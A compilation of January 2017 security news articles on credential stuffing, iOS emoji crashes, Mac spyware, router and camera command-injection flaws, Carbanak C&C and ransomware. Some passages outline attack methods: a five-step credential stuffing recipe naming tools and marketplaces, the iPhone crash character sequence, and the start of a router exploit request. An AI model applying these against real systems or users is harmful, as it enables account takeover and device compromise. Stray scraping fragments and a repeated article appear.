Credential theft occurs when attackers breach a system and steal users' access credentials -- usually ID and password. The ID is most commonly the user's email address. Credential spilling is when those credentials are made available to other criminals. Credential stuffing is the large scale use of automated means to test stolen passwords against other unrelated websites.

It is made possible because of the tendency for users to recycle their passwords for multiple accounts. This means that if criminals can crack stolen passwords from one account, they have legitimate credentials that have quite likely been used on other accounts.

Consider the two Yahoo breaches reported in 2016. A total of 1.5 billion credentials were spilled to the Internet, protected by the weak MD5 hashing algorithm. The thefts took place in 2012 and 2013, giving the criminals up to four years to crack weak protection. Occurrences like this mean that criminals have vast troves of legitimate user credentials -- and user password recycling means that many will have been used on other accounts. "The sheer scale of the credential theft and also the prevalence of Yahoo users' accounts suggests that these stolen credentials have been benefiting cybercriminals over the past few years," suggests the Shape report (PDF).

Simple brute force testing to discover where spilled passwords may have been reused is easily defeated. Web sites invariably have defenses that will detect repeated login attempts from the same IP address, or multiple failed attempts at the same account -- and simply block them.

Now consider credential stuffing. The term was coined by Shape Security co-founder Sumit Agarwal when he was serving as Deputy Assistant Secretary of Defense at the Pentagon. It is the combination of source credentials, an attack tool such as Sentry MBA, and a botnet delivery method. Sentry MBA cycles through the botnet to probe a target website with the spilled credentials. Since each IP within the botnet tries only one credential attempt at a time, there is nothing at the target end to suggest anything different to a normal user login attempt -- which either succeeds or fails. Even if an attack is suspected, Sentry MBA has moved on to the next botnet IP and blocking the suspect IP has no effect.

Sentry MBA provides various techniques to defeat other defenses -- such as built-in optical character recognition to solve CAPTCHA challenges.

Shape's figures suggest that the criminal return on credential stuffing can be anything between 0.1% and 2%. This implies that for every 1 million stolen credentials used by the criminals, an average of 10,000 accounts could be accessed because of user re-use of passwords.

Credential stuffing is not an arcane attack method -- it is widely and increasingly used. For example, Shape reports, "In one week, cybercriminals made over five million login attempts at a Fortune 100 B2C website using multiple attack groups and hundreds of thousands of proxies located throughout the world." On another occasion, "During one day, a large retailer witnessed over 10,000 login attempts using over 1,000 proxies."

Nor are stolen credentials difficult to find. Some are simply dumped on the internet, given away free by hackers who hack for fun, or by others wishing to build a reputation. That reputation is necessary to gain access to, and do business on, some of the dark web credential marketplaces such as Cracking-dot-org, Crackingking-dot-org and Crackingseal-dot-io.

The result is an attack methodology that is easy and effective, and can be operated by any person with just the merest of technical skills. It involves just five steps: obtain the stolen credentials; choose a target; create an automation script to recognize whether the login attempt succeeds or fails; use a configurable credential stuffing tool such as Sentry MBA that can bypass controls such as WAF and CAPTCHA; takeover accounts and steal assets.

Shape Security is predicting that credential stuffing will become a major issue during 2017 as the 3.3 billion credentials spilled in 2016 (there may be more that we don't yet know about) work their way through the criminal system. The ultimate solution to the problem is simple: users must never reuse existing passwords. Ensuring that has so far been beyond both business and the security industry. In the meantime, business must seek other methods to protect against this growing threat.

Shape Security emerged from stealth mode in January 2014. One month later it announced that it had raised $40 million in a Series C funding round. In January 2016 it raised a further $25 million in a Series D funding round.

You Can Crash Anyone's iPhone Or iPad With A Simple Emoji Text Message
19.1.2017 thehackernews Apple

A newly discovered bug in Apple's iOS mobile operating system is being exploited in a prank that lets anyone crash your iPhone or iPad by just sending an emoji-filled iMessage, according to several reports.
YouTube star EverythingApplePro published a video highlighting a sequence of characters that temporarily freeze and restart an iPhone, which people can send to their iPhone buddies to trouble them. You can watch the video demonstration below.
Here's the first troublesome text: A white Flag emoji, the digit "0" and a Rainbow emoji.

This simple numeric character, flag, and rainbow emojis confuse iOS 10 devices when it tries to combine them into a rainbow flag.
As soon as this text is received, the iPhone's software attempts to combine the emojis but fails, and the messaging app crashes and eventually reboots in a few minutes. The recipients do not even have to open or read the message.
Video Demonstration


Another iPhone-crashing method involves the same characters, but saving them as a contact file and then sending that file to an iMessage contact via iCloud's sharing feature.
This, in turn, will crash the target's device, even if the victim has not manually opened the file.

Both the methods mentioned above will crash and iPhone or iPad to varying degrees, although the simple text string sent via a standard iMessage appears to affect iPhones and iPads running iOS 10.1 or below.
However, the boobytrapped contact card affects all versions of iOS 10, including Apple's latest iOS 10.2 operating system.
There is nothing you can do to protect yourself against this issue, as these iPhone-crashing issues have the ability to crash and reboot your iPhone or iPad without your interaction.
So, we hope that Apple releases a patch quickly to plug the issues, though the company has declined to comment on the issue.
This is not the first time EverythingApplePro has shared iOS-crashing issues. The YouTuber has a long history of reporting on iPhone crash pranks.

Newly Discovered Mac Malware with Ancient Code Spying on Biotech Firms
19.1.2017 thehackernews

Security researchers have discovered a rare piece of Mac-based espionage malware that relies on outdated coding practices but has been used in some previous real-world attacks to spy on biomedical research center computers.
Dubbed Fruitfly, the malware has remained undetected for years on macOS systems despite using unsophisticated and "antiquated code."
Infosec firm Malwarebytes discovered Fruitfly, detected as 'OSX.Backdoor.Quimitchin,' after one of its IT administrators spotted some unusual outgoing activity from a particular Mac computer.

According to the researchers, the recently discovered what they're calling "the first Mac malware of 2017" contains code that dates before OS X, which has reportedly been conducting detailed surveillance operation on targeted networks, possibly for over two years.
Fruitfly uses a hidden pearl script to communicate back to two command-and-control (C&C) servers and has the ability to perform actions like capturing webcam and screenshots from both Mac and Linux systems, grabbing the system's uptime, and moving and clicking a mouse cursor.
Fruitfly can also collect information about other devices connected to the same network as the infected Mac, and then tries to connect to them, according to a blog post published by Malwarebytes.
The malware also uses a secondary script and Java class to hide its icon from showing in the macOS Dock, though it's still unclear how the malware got distributed and infected the machines.
What's more interesting is that the malware uses code that pre-dates Apple's OS X operating system, including SGGetChannelDeviceList, SGSetChannelDevice, SGSetChannelDeviceInput, and SGStartRecord.

Researchers said the malware is even running open-source "libjpeg" code to open or create JPEG-formatted image files, which was last updated in 1998.
On further digging into the code, the researchers discovered the malware had even gone through changes to "support" Mac OS X Yosemite indicating Fruitfly is at least two years old.
However, the old code and upgrade to support Mac Yosemite do not indicate the exact creation date of the malware.
"The only reason I can think of that this malware has not been spotted before now is that it's being used in very tightly targeted attacks, limiting its exposure," Thomas Reed of Malwarebytes wrote in the post.
"There have been [many] stories over the past few years about Chinese and Russian hackers targeting and stealing the United States and European scientific research. Although there is no evidence at this point linking this malware to a specific group, the fact that it has been seen specifically at biomedical research institutions certainly seems like it could be the result of exactly that kind of espionage."
The Fruitfly's code even includes Linux shell commands that show signs of the malware potentially running just fine on Linux operating system. So, it would come as no surprise if a Linux variant of Fruitfly was in operation.
Reed also said he has also come across related Windows executables that connected to the same C&C server used by the Fruitfly malware but date back to at least 2013.
However, the good news is that Apple has released an update for macOS to address Fruitfly. Although Apple automatically pushes the update, Mac users should consider checking their systems for infections, which is actually known as OSX.Backdoor.Quimitchip.

XSS Found in Silently Installed Acrobat Chrome Extension

19.1.2017 Securityweek Vulnerebility

Google Project Zero researcher Tavis Ormandy discovered that a Chrome extension installed silently by Adobe last week had been affected by a cross-site scripting (XSS) vulnerability. Adobe quickly patched the flaw after learning of its existence.

The updates released by Adobe on January 10 for Acrobat and Reader addressed 29 vulnerabilities. However, some users were displeased that the updates also automatically installed an Adobe Acrobat Chrome extension designed for converting web pages into PDF files.

The Windows-only extension requires permission to access data on the websites visited by the user, manage downloads, and communicate with cooperating native apps. The tool also collects some information from the system, but Adobe claims no personal information is involved and the “anonymous data will not be meaningful to anyone outside of Adobe.”

After analyzing the extension, which has roughly 30 million installs, Ormandy identified a DOM-based XSS vulnerability that allowed privileged JavaScript code execution. The expert classified the security hole as “critical severity.”

“I think CSP [Content Security Policy] might make it impossible to jump straight to script execution, but you can iframe non web_accessible_resources, and easily pivot that to code execution, or change privacy options via options.html, etc,” the Google researcher explained in an advisory.

The issue was reported to Adobe on January 12 and it was patched a few days later. It is not surprising that the vulnerability was fixed quickly considering that many of the flaws found in Adobe products are reported by Google Project Zero researchers or through the Chromium Vulnerability Rewards Program.

This was not the first time Ormandy identified a vulnerability in a Chrome extension. Roughly one year ago, the expert revealed that an extension automatically installed by AVG AntiVirus exposed users’ browsing history and other personal data.

Chrome Users Targeted in Malware Campaign

19.1.2017 Securityweek Virus

A recently observed malware distribution campaign has been specifically devised to target users of the Chrome browser on Windows-based computers, Proofpoint security researchers warn.

The campaign uses the infamous EITest infection chain, which has been previously associated with numerous exploit kit attacks leading to ransomware, information stealers, and other malware. First documented in 2014, EITest has seen numerous changes, and the switch to more targeted attacks instead of relying on exploit kits for infection is one of them.

The newly observed attack change was first noticed in December, when a compromised website was dropping the “Chrome_Font.exe” file onto visitors’ computers. The site, Proofpoint discovered, was EITest-compromised, and was dropping the file only after a series of filtering mechanisms were triggered.

The attack, security researchers found out, was targeting Chrome for Windows users specifically. As soon as the visitor was determined to use this browser, the code injected in the page would make text unreadable, and a fake alert was displayed, prompting the user to download and install a file supposedly containing new fonts.

“The infection is straightforward: if the victim meets the criteria - targeted country, correct User-Agent (Chrome on Windows) and proper referer - the script is inserted in the page and rewrites the compromised website on a potential victim's browser to make the page unreadable, creating a fake issue for the user to resolve,” Proofpoint researcher Kafeine explains.

The website, however, would attempt to infect Internet Explorer users as well. As long as they met specific criteria, they were exposed to a more “classic” exploit kit attack, the researcher notes.

The attack on Chrome users relied on storing all the data between HTML tags in an array, then replacing them with “&#0”. Because this is not a proper ISO character, the browser would display the replacement character � instead.

A fake alert displayed in the browser would prompt users to install an updated font pack to view the content of the page. The victim was told that the specific font (“HoeflerText,” in Proofpoint’s example) wasn’t found, and that the user should install the update immediately. The fake alert can’t be closed using the “x” button and malware is executed when the user approves the so called update.

Proofpoint suggests that the campaign was launched on December 10, 2016 and says that the “Chrome_Font.exe” file that users are tricked to install is in fact the ad fraud malware known as Fleercivet.

The malware spreads in affiliate mode, with its affiliate initially seen on underground markets as “Simby,” until they disappeared in early 2015, only to reappear later that year as “Clicool.” Upon infection, the malware causes the computer to browse the Internet in the background, on its own.

The new campaign, Kafeine says, is important because the new patch added to the EITest compromise chain combines social engineering with the targeting of Chrome users (different paths have been added to the EITest before, such as the redirection to an Android “Police” Browser locker spotted in December 2014.).

“Because actors are finding it more difficult (and therefore less profitable) to achieve conversions (i.e., malware installations) via exploit kit, they are turning to new strategies. As with other threats, actors are exploiting the human factor and are tricking users into loading the malware themselves, this time via selective injects into websites that create the appearance of problems along with the offer of fake solutions,” Proofpoint’s researcher concludes.

Hackers Offered Over $1 Million at Pwn2Own 2017

19.1.2017 Securityweek Hacking

For the 10th anniversary of the Pwn2Own hacking contest, Trend Micro and the Zero Day Initiative (ZDI) have introduced new exploit categories and they are prepared to offer more than $1 million worth of prizes.

Pwn2Own 2017 will take place in mid-March alongside the CanSecWest conference in Vancouver, Canada. Organizers have announced five major categories for the event: virtual machine (VM) escapes, web browsers and plugins, local privilege escalation, enterprise applications, and server side.

VM escapes were first introduced at Pwn2Own 2016 with VMware, but none of the contestants demonstrated a successful exploit. Researchers did manage to hack VMware Workstation and earned $150,000 in November at the PwnFest competition in South Korea.

At this year’s Pwn2Own, experts can earn $100,000 if they manage to execute arbitrary code on the host from a non-admin account in the guest operating system. In addition to VMware Workstation, Microsoft Hyper-V has also been added to the list of targets.

In the web browsers category, Mozilla Firefox has been reintroduced this year and hacking it can earn researchers $30,000. Exploits targeting Microsoft Edge and Google Chrome are worth $80,000, while Apple Safari and Adobe Flash Player exploits are worth $50,000.

Bonuses will be awarded for SYSTEM-level code execution on Windows ($30,000) and Mac OS X ($20,000), and VM escapes ($100,000). The bonuses are cumulative so, for example, if a contestant hacks Chrome, elevates privileges to SYSTEM and escapes the VM, they can earn $210,000 in one go.

Considering that local privilege escalation vulnerabilities can be highly useful for a piece of malware, these types of flaws get their own category this year, with prizes of $30,000 for Windows 10, $20,000 for macOS and $15,000 for Ubuntu Desktop.

The “enterprise applications” category includes Adobe Reader and the Microsoft Office apps Word, Excel and PowerPoint. Hackers can earn $50,000 for vulnerabilities affecting these applications.

The most valuable exploits are in the “server side” category. Hackers can earn $200,000 for successful exploits against Apache Web Server running on Ubuntu Server.

Each exploit will also be rewarded with Master of Pwn points. The contestant with the highest number of total points will receive 65,000 ZDI reward points, which are worth roughly $25,000.

Registration for Pwn2Own 2017 closes on March 12 at 5 PM Pacific Time. Additional information and rules are available on ZDI’s website.

US-CERT – Warning, Shadow Brokers Hackers are offering an SMB Zero-Day exploit
19.1.2017 securityaffairs

The US-CERT has issued a warning after the Shadow Brokers hackers have offered to sell what it claims to be an SMB Zero-Day exploit.
The United States Computer Emergency Readiness Team (US-CERT) has issued a warning after the Shadow Brokers hacker group has offered to sell what it claims to be an SMB Zero-Day exploit.

The Shadow Brokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a database containing hacking tools and exploits.

A few days ago the notorious hacker group Shadow Brokers announced the sale of an archive of Windows exploits and hacking tools stolen from the Equation group.

The mysterious hacking group has apparently decided to put an end to their failed attempts to sell exploits and hacking tools they claimed to have stolen from the NSA-linked Equation Group.
While the group claims to have decided to retire, the stolen exploits are still up for sale for the price of 10,000 bitcoins (roughly $8.7 million at the current exchange).

The precious archive seems to include also a zero-day exploit targeting the Server Message Block (SMB) network file sharing protocol.

“In response to public reporting of a potential Server Message Block (SMB) vulnerability, US-CERT is providing known best practices related to SMB. This service is universally available for Windows systems, and legacy versions of SMB protocols could allow a remote attacker to obtain sensitive information from affected systems,” US-CERT said.

Giving a close look at the list published by Shadow Brokers team it is possible to note a tool that claims to be an SMB Zero-Day exploit that goes for 250 bitcoins. The hackers describe the exploit as a remote code execution zero-day targeting SMB. The group is offering it under the name “SMB cloaked backdoor” for 50 bitcoins, but the complete package includes IIS, RDP RPC and SMB exploits for 250 bitcoins.

SMB Zero-Day Shadow Brokers

The US-CERT has advised users and administrators to consider disabling SMB v1, and block all versions of SMB at the network boundary. SMB typically uses port 445 (TCP/UDP), ports 137 and 138 (UDP), and port 139 (TCP).

The US-CERT provided the following recommendations to users and administrators:

disabling SMB v1 and
blocking all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139, for all boundary devices.
Anyway, it is important to consider that disabling or blocking SMB may create problems by obstructing access to shared files, data, or devices.

“The benefits of mitigation should be weighed against potential disruptions to users. For more information on SMB, please review Microsoft Security Advisories 2696547(link is external) and 204279(link is external).” continues the advisory.

The US-CERT has already issued in the past an alert following a Shadow Brokers initiative, in September it warned organizations after the hacker crew leaked exploitation tools flaws affecting Cisco ASA solutions.

“In August 2016, a group known as “Shadow Brokers” publicly released a large number of files, including exploitation tools for both old and newly exposed vulnerabilities. Cisco ASA devices were found to be vulnerable to the released exploit code. In response, Cisco released an update to address a newly disclosed Cisco ASA Simple Network Management Protocol (SNMP) remote code execution vulnerability (CVE-2016-6366).”

Smile! Hackers Can Remotely Access Your Samsung SmartCam Security Cameras
19.1.2017 thehackernews Hacking
It's not necessary to break into your computer or smartphone to spy on you. Today all devices in our home are becoming more connected to networks than ever to make our lives easy.
But what's worrisome is that these connected devices can be turned against us, anytime, due to lack of stringent security measures and insecure encryption mechanisms implemented in these Internet of Things (IoTs) devices.
The most recent victim of this issue is the Samsung's range of SmartCam home security cameras.
Yes, it's hell easy to hijack the popular Samsung SmartCam security cameras, as they contain a critical remote code execution (RCE) vulnerability that could let hackers gain root access and take full control of these devices.
SmartCam is one of the Samsung's SmartThings range of devices, which allows its users to connect, manage, monitor and control "smart" devices in their home using their smartphones or tablets.

Back in 2014, the hacking group Exploiteers, which was previously known as GTVHacker, listed some SmartCam exploits that could have allowed remote attackers to execute arbitrary commands and let them change the camera's administrator password.
But instead of patching the flaw, Samsung decided to rip out the accessible web interface and use an alternate route that forced its users to run their SmartCams through the company's SmartCloud website.
So, it turns out that Exploiteers broke into the Samsung's SmartCam devices again with a different hacking exploit, allowing hackers to view what are supposed to be private video feeds.
What went wrong? Samsung had patched the original flaws but left one set of scripts untouched: Some PHP scripts that provide firmware updates through the SmartCam's "iWatch" webcam monitoring software.
These PHP scripts have a command injection vulnerability which could allow unauthorized users without admin privileges to execute remote shell commands with root privileges.
"The vulnerability occurs because of improper sanitization of the iWatch firmware update filename," a post on Exploiteers website reads. "A specially crafted request allows an attacker the ability to inject his command providing the attacker remote root command execution."
This defect, in turn, allows the web management system to be turned on, which was turned off by the vendor.

Exploiteers has also provided a proof-of-concept video demonstration that shows their exploit successfully working on the SmartCam SNH-1011 model, but security experts believe all Samsung SmartCam devices are affected.
How to Mitigate the Vulnerability?
An official patch from Samsung does not appear to be available yet, but the good news is that the folks at Exploiteers have shared a DIY patch that can be downloaded by SmartCam users.
However, I personally advise users to wait for an official firmware update from the company, rather than running untrusted code on their devices, though there's no indication yet if Samsung has any plan to issue a proper patch in upcoming days.
Another way to mitigate the vulnerability is by keeping your SmartCam behind a network firewall.
Samsung has yet to respond on the issue.

Quimitchin, a Mac backdoor that includes antiquated code
19.1.2017 securityaffairs

Researchers at Malwarebytes have discovered the first Mac malware of 2017, dubbed Quimitchin, that was used against biomedical research institutions.
Security experts have spotted the first Mac malware of 2017, dubbed Quimitchin, and it is considered a malicious code not particularly sophisticated and includes some antiquated code.

According to the researchers from Malwarebytes, the code has been in the wild for several years and was used in targeted attacks against biomedical research institutions.

The Quimitchin spyware was discovered by an IT admin who noticed an anomalous traffic from a certain Mac in his network.

The malicious code is composed of two only two files:

A .plist file that simply keeps the .client running at all times.
A .client file containing the malicious payload, a minified and obfuscated Perl script.
The main features implemented by the payload are the screen captures and webcam access.

“The script also includes some code for taking screen captures via shell commands. Interestingly, it has code to do this both using the Mac “screencapture” command and the Linux “xwd” command. It also has code to get the system’s uptime, using the Mac “uptime” command or the Linux “cat /proc/uptime” command.” reads the analysis published by MalwareBytes.

The ability of the malware to exfiltrate data from anything it can access, and the nature of the targets, biomedical facilities, suggest that threat actors behind the attacks were conducting a cyber espionage campaign.


The Quimitchin uses antique system calls, and the analysis of its code revealed the use of the open source libjpeg code, which was last updated in 1998.

“These are some truly ancient functions, as far as the tech world is concerned, dating back to pre-OS X days. In addition, the binary also includes the open source libjpeg code, which was last updated in 1998.” continues the analysis.

“The Java class appears to be capable of receiving commands to do various tasks, which include yet another method of capturing the screen, getting the screen size and mouse cursor position, changing the mouse position, simulating mouse clicks, and simulating key presses. This component appears to be intended to provide a kind of rudimentary remote control functionality.”

Experts from Malwarebytes suspect that there is also a specific Linux variant in the wild because they have found Linux shell commands in the code of the scripts.

The security firm also found two Windows executable file that communicated with the same C&C server, in one case the Windows code used the same libjpeg library.

Despite the Quimitchin is not so complex, it continues to properly work avoiding the detection, something similar to the EyePyramid code.

Why a code like Quimitchin wasn’t detected for so long time?

Expert believe that is was using in a limited number of targeted attack so he was not spotted before.

US cancer agency targeted by a singular ransomware attack
19.1.2017 securityaffairs

A new ransomware campaign has targeted the not-for-profit cancer services organisation “Little Red Door” requesting a US$44,000 ransom.
A new ransomware campaign has targeted a not-for-profit cancer services organisation, the Little Red Door. The organization provides a number of cancer support services, including diagnostics and treatment.

The system at the agency was infected by a ransomware last Wednesday, January 11, 2017, at around 10:00 PM.

According to the Associated Press a ransomware infected its server and demanded a 50 bitcoin ransom (roughly US$44,000) in order to decrypt the files.


“A ransomware group has infected the computers of an Indiana-based cancer agency and have asked for a large payment of 50 Bitcoin ($44,800).” reported Bleepingcomputer.com.

“The victim is Cancer Services of East Central Indiana-Little Red Door, an organization that helps “reduce the financial and emotional burdens of those dealing with a cancer diagnosis.“”

The Little Red Door Executive director, Aimee Fant, confirmed that data of the organization was stored in unspecified cloud storage.

The singularity of this specific ransomware attack it the fact crooks demanding the ransom directly to the cancer agency’s staff via phone and email.

“First, they sent text messages to the agency’s Executive Director, President, and Vice President phones, and then they sent a standardized “form letter” via email. The emails contained detailed payment instructions, but also several threats.” added bleepingcomputer.com.

According to the cancer agency’s Executive Director Aimee Fant, the group threatened to contact family members of living and deceased cancer clients, donors and community partners.

The organization, of course, will not pay the ransom because its money has to be used to provide the necessary services to cancer patients and their families.

“The agency will not raise money to pay the criminals’ ransom,” Fant said.

This is really a sad story, the organization has no choice, it has to replace the infected server and store the old one in the hope a security firm or law enforcement will find decryption keys during their operations.

The agency plans to replace the server with a “secure cloud-based” platform and hopes to be restored operations within the week.

The attack was reported by the organization to the FBI.

The Carbanak gang is with a new modus operandi, Google services as C&C
18.1.2017 securityaffairs Crime

The infamous Carbanak cybercrime gang is back and is leveraging Google services for command-and-control of its malicious codes.
The dreaded Carbanak cybercrime gang is back and is adopting a new tactic for its attacks, it is leveraging Google services for command-and-control of its malware.

The criminal organization is named Carbanak cybergang because of the name of the malware they used to compromise computers at banks and other financial institutions, experts estimated that the hackers swiped over $1 Billion from their victims.

The majority of financial institutions victims of the gang are located in Russia, but many other attacks have been detected in other countries, including Japan, Europe and in the United States.

Carbanak targets
Figure 1 – Map of Infections, 2015 Attacks against financial Institutions (Kaspersky Lab)

The investigators discovered that the “Carbanak cybergang” hit more than 100 financial institutions in 30 countries, it has been active at least since 2013 and there are strong indications that it may still be ongoing.

Now researchers from Forcepoint Security Labs have spotted a new campaign conducted by the Carbanak gang that exploits Google’s Apps Script, Sheets, and Forms cloud-based services to control their malicious code.

The attack vector is a trojanized RTF document with an encoded Visual Basic script that is spread via email.

“Forcepoint Security Labs™ recently investigated a trojanized RTF document which we tied to the Carbank criminal gang. The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware have now included the ability to use Google services for command-and-control (C&C) communication. We have notified Google of the abuse and are working with them to share additional information.” reads the analysis published by Forcepoint.

“For each infected user a unique Google Sheets spreadsheet is dynamically created in order to manage each victim. The use of a legitimate third party service like this one gives the attacker the ability to hide in plain sight,” Forcepoint wrote in a blog post today.

The crooks used the “ggldr” script to send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services.

Hackers used to create a unique Google Sheets spreadsheet for each infected user, in this way they attempted to avoid detection.

“The use of a legitimate third party service like this one gives the attacker the ability to hide in plain sight. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully.” states the report.

The following diagram describes the way the Carbanak cybercrime gang exploited the Google Services as C&C.

Once infected the victim’s machine, the malware first attempt to contact the hard-coded Google Apps Script URL with the user’s unique infection ID. Because no spreadsheet currently exists for the specific victim, the malware will then send two requests to another hard-coded Google Forms URL which will result in the creation of unique Google Sheets spreadsheet and Google Form IDs for the victim.

The second time the Google Apps Script is requested by the malicious code, the C&C will return the unique Google Sheet and Google Form ID values.

“The “entry” value is also a unique ID which is sent with each subsequent Google Forms C&C request.”

Let me suggest to read the report that also includes the IoCs for this specific threat.

Hacker found a way to hack Facebook by exploiting the ImageMagick flaw
18.1.2017 securityaffairs

The bug hunter Andrew Leonov has described how to exploit an ImageMagick flaw to remotely execute code on a Facebook server.
The hacker Andrew Leonov (@4lemon) has described how to exploit the so-called ImageMagick vulnerability to remotely execute code on a Facebook server.

The ImageMagick flaw, tracked as CVE-2016-3714, affects the popular image manipulation software, ImageMagick. The flaw could be exploited by hackers to take over websites running the widely used image-enhancing app. The vulnerability in ImageMagick App allows attackers to run arbitrary code on the targeted web servers that rely on the app for resizing or cropping user-uploaded images.

Andrew Leonov @4lemon
@Facebook #ImageTragick remote code execution http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html … #RCE #BugBounty
11:28 AM - 17 Jan 2017
208 208 Retweets 258 258 likes
The researcher has detailed in a post the attack and also provided a proof-of-concept exploit for the hack, Facebook has awarded him with the highest payoff since now, US$40,000.

“Once upon a time on Saturday in October i was testing some big service (not Facebook) when some redirect followed me on Facebook. It was a «Share on Facebook» dialog:” wrote Leonov.

Facebook ImageMagick

“Which many of you could see. If we look closer we can see that a `picture` parameter is a url. But there isn’t image url on page content like mentioned above.” added Leonov.

The expert has discovered the vulnerability after a service redirected him to the Facebook platform, initially he was he was convinced he had discovered a server-side request forgery vulnerability.

“First of all I thought about some kind of SSRF issue. But tests showed that url from this parameter requested from 31.13.97.* network by facebookexternalhit/1.1.”

After testing the application, the expert devised the following workflow:

Gets `picture` parameter and requests it – this request is correct and not vulnerable
Received picture passes on converter’s instance which used vulnerable ImageMagick library
The management of the flaw was perfect, the expert reported the issue to Facebook through the bug bounty program in October and the IT giant fixed it in less than three days.

Thai TrueOnline ZyXEL and Billion routers still unpatched since July
18.1.2017 securityaffairs

The security researcher Pedro Ribeiro disclosed several vulnerabilities in the ZyXEL customized routers that could be easily exploited by hackers.
Details on serious vulnerabilities in a number of routers freely distributed by the TrueOnline Thai ISP were published on Monday after private disclosures made to the vendors in July went unanswered.

The security researcher Pedro Ribeiro from Agile Information Security disclosed multiple flaws in a number of routers distributed by the Thai ISP TrueOnline.

The Thai ISP distributes several rebranded ZyXEL and Billion routers to its customers.

The models ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion 5200W-T contain a number of default administrative accounts and their web interfaces are affected by command injection vulnerabilities. On Monday Ribeiro published a proof of concept exploit, he released Metasploit modules for the exploitation of the vulnerabilities in the routers.

ZyXEL customized routers

All the routers are still in widespread use in Thailand, with the Billion 5200W-T router currently being distributed to new customers.

“TrueOnline is a major Internet Service Provider in Thailand which distributes various rebranded ZyXEL and Billion routers to its customers. Three router models – ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion 5200W-T – contain a number of default administrative accounts, as well as authenticated and unauthenticated command injection vulnerabilities in their web interfaces, mostly in the syslog remote forwarding function.” reads the advisory. “All the routers are still in widespread use in Thailand, with the Billion 5200W-T router currently being distributed to new customers.”

Ribeiro reported the vulnerabilities via the SecuriTeam Secure Disclosure Program, which notified them to the vendors in July.

The network devices are based on the TC3162U SoC system-on-a-chip manufactured by TrendChip, in particular, flawed routers have two firmware variants called “ras” and “tclinux.”

Riberio discovered security vulnerabilities in the ‘tclinux’ variant, several ASP files in the web interface are affected by command injection attack issues.

“It should be noted that tclinux contains files and configuration settings in other languages (for example in Turkish). Therefore it is likely that these firmware versions are not specific to TrueOnline, and other ISP customised routers in other countries might also be vulnerable,” added Ribeiro. “It is also possible that other brands and router models that use the tclinux variant are also affected by the command injection vulnerabilities (the default accounts are likely to be TrueOnline specific).”

The researcher explained that the majority of the vulnerabilities can be exploited remotely, by both authenticated and unauthenticated attackers.

The ZyXel P660HN-T v1 router is affected by an unauthenticated command injection issue that can be remotely exploited by attackers.

“This router has a command injection vulnerability in the Maintenance > Logs > System Log > Remote System Log forwarding function. The vulnerability is in the ViewLog.asp page, which is accessible unauthenticated. The following request will cause the router to issue 3 ping requests to

POST /cgi-bin/ViewLog.asp HTTP/1.1


The ZyXel P660HN-T V2 router in affected by the same issue, but it can be remotely exploited only by authenticated attackers.

“Unlike in the P660HN-Tv1, the injection is authenticated and in the logSet.asp page. However, this router contains a hardcoded supervisor password (see below) that can be used to exploit this vulnerability. The injection is in the logSet.asp page that sets up remote forwarding of syslog logs, and the parameter vulnerable to injection is the serverIP parameter” states the advisory.

The third router distributed by the Thai ISP is the Billion 5200W-T model, this model is affected by unauthenticated and authenticated command injection issues. According to the researcher a flaw resides in the its adv_remotelog.asp page.

“The Billion 5200W-T router also has several other command injections in its interface, depending on the firmware version, such as an authenticated command injection in tools_time.asp (uiViewSNTPServer parameter),” Ribeiro said. “It should be noted that this router contains several hardcoded administrative accounts that can be used to exploit this vulnerability.”

All the versions use default and weak admin credentials that were remotely accessible.

President Obama commutes Chelsea Manning sentence
18.1.2017 securityaffairs BigBrothers
President Barack Obama has commuted Chelsea Manning’s sentence for leaking confidential documents to Wikileaks in 2010. He will be released on May 17th.
President Barack Obama took a historic decision, he has commuted Chelsea Manning’s sentence for leaking classified documents to Wikileaks in 2010. The news was reported by The New York Times, Manning is due to be released on May 17th.

Chelsea Manning, born as Bradley Manning, was sentenced to 35 years in 2013, when he was serving the US Army passed diplomatic cables to the anti-secrecy group Wikileaks.

The data leak was one of the largest breaches of classified documents in the history of the United States.

At the time of the data leak, Bradley Manning was serving as an intelligence analyst in Iraq. He provided more than 700,000 documents to WikiLeaks, the huge trove of documents includes the video of a 2007 airstrike in Baghdad that caused the death of two Reuters employees.

Recently Wikileaks announced the Assange’s intention agree to US extradition if Obama grants Manning’s clemency.

WikiLeaks ✔ @wikileaks
If Obama grants Manning clemency Assange will agree to US extradition despite clear unconstitutionality of DoJ case https://twitter.com/wikileaks/status/765626997057921025 …
8:40 PM - 12 Jan 2017
6,691 6,691 Retweets 5,676 5,676 likes
WikiLeaks ✔ @wikileaks
Assange: "Thank you to everyone who campaigned for Chelsea Manning's clemency. Your courage & determination made the impossible possible."
11:29 PM - 17 Jan 2017
4,295 4,295 Retweets 9,148 9,148 likes
“Obama may well have just saved Chelsea Manning’s life,” commented Sarah Harrison, who has defended Manning as Active Director of the Courage nonprofit. “Freeing her is clearly and unambiguously the right thing to do.”

She confirmed anyway the criticism for the President Obama’s decision to persecute Manning under the Espionage Act.

“Today’s news will not make good the harm done on Obama’s watch,” Harrison added. “Chelsea’s conviction under the Espionage Act and 35-year sentence set a terrible precedent that is left entirely intact by this commutation. Who knows what Donald Trump will do with this precedent, and these powers, that Obama has left him?”
The Manning’s commutation was part of a larger effort of the US Government that resulted in 209 commutations and 64 pardons. President Obama issued 1,385 grants of commutation during his administration, none made like him.

e remotely accessible.

Hackers demonstrate how to hack Samsung SmartCam
17.1.2017 securityaffairs Hacking

Researchers Exploitee.rs discovered a flaw in Samsung SmartCam IP cameras that could be exploited to execute commands and hijack vulnerable devices.
Samsung SmartCam IP cameras are affected by a serious vulnerability that could be exploited by remote attackers to execute commands and hijack vulnerable devices.
Samsung Electronics sold the Samsung Techwin security division to the Hanwha Group in 2014, but Hanwha SmartCam products are still distributed as Samsung.

In 2014 at DEFCON 22, security experts at Exploitee.rs revealed a number of exploits that could have been used to execute arbitrary commands on Samsung SmartCam. An attacker could use the exploits to change device settings, including the administrator password.

A few months ago, the experts from Pen Test Partners also reported security issues in Samsung SmartCam products.

